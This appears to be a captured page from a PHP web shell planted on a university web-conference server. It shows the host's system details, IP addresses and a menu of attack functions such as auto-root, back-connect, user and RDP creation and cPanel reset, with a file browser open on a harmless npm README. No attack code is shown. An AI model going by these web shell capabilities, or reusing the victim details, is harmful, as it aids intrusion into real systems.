Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.222.164.252
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-lazy-property /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
806
B
-rw-r--r--
changelog.Debian.gz
426
B
-rw-r--r--
copyright
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
lazy-property ============= Adds a lazily initialized property to an object. ## Example ```javascript var addLazyProperty = require("lazy-property") var obj = {} addLazyProperty(obj, "foo", function() { console.log("initialized!") return "bar" }) //Access the property console.log(obj.foo) console.log(obj.foo) //Prints out: // // initialized! // bar // bar // ``` ## Install npm install lazy-property ## API ### `require("lazy-property")(obj, name, init[, enumerable])` Adds a lazily initialized property to the object. * `obj` is the object to add the property to * `name` is the name of the property * `init` is a function that computes the value of the property * `enumerable` if the property is enumerable (default `false`) ## Credits (c) 2013 Mikola Lysenko. MIT License
Close